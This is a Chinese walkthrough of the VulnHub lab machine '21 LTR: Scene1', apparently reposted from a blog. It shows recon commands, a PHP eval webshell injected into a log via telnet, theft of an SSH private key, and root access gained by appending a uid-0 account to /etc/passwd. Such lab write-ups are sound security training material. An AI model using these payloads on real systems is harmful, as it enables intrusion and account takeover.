您的位置:首页 > 房产 > 家装 > vulnhub靶机:21 LTR: Scene1

vulnhub靶机:21 LTR: Scene1

2024/12/23 9:33:00 来源:https://blog.csdn.net/weixin_68416970/article/details/142235748  浏览:    关键词:vulnhub靶机:21 LTR: Scene1

下载

下载地址:https://www.vulnhub.com/entry/21ltr-scene-1,3/

导入靶机

一直按默认的来,一直下一步

修改网卡

修改靶机和 kali 攻击机网络模式为仅主机模式

把仅主机模式的 IP 修改为 192.168.2.0

信息收集

主机发现

arp-scan -l

靶机 IP 是 192.168.2.120

端口扫描

nmap -p- 192.168.2.120

目录扫描

python3 dirsearch.py -u "192.168.2.120"

访问 web

查看页面源代码,发现账号和密码

尝试ssh连接没成功,但是ftp连接成功了,ls查看,发现只有一个文件

ftp 192.168.2.120
logs								# 账号
zg]E-b0]+8:(58G			# 密码

下载下来

get backup_log.php /home/kali/Desktop/1.php
cat 1.php

拼接到刚才扫描到的 logs 目录下,发现可以访问到日志文件 /logs/backup_log.php

上传一句话木马

尝试在日志文件写入木马,参考了一下其他文档,需要利用10001端口

telnet 192.168.2.120 10001
<?php @eval($_REQUEST['cmd']);?>

蚁剑连接

查看一下敏感文件

因为有ssh服务,就读取一下密钥,把密钥下载下来拖进 kali 桌面

/media/USB_1/Stuff/Keys/id_rsa

赋予权限,然后ssh登录

chmod 600 id_rsa
ssh -i id_rsa hbeale@192.168.2.120

要是有这个报错的话(sign_and_send_pubkey: no mutual signature supported)

将一下内容写入config

cd ~/.ssh
vim config
echo "PubkeyAcceptedKeyTypes +ssh-rsa" >> config

提权

查看用户文件

cat /etc/passwd

另起一个终端

openssl passwd 123456

用 $1$Y3B2pavB$u.TqnuWsw.1L4ih3HAWk3. 替换 root:x:0:0::/root:/bin/bash 中的 x

并新起一个名字 newt

newt:$1$Y3B2pavB$u.TqnuWsw.1L4ih3HAWk3.:0:0::/root:/bin/bash

把它写入/etc/passwd

echo 'newt:$1$Y3B2pavB$u.TqnuWsw.1L4ih3HAWk3.:0:0::/root:/bin/bash' >> /etc/passwd
cat /etc/passwd

提权成功

su newt
123456

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com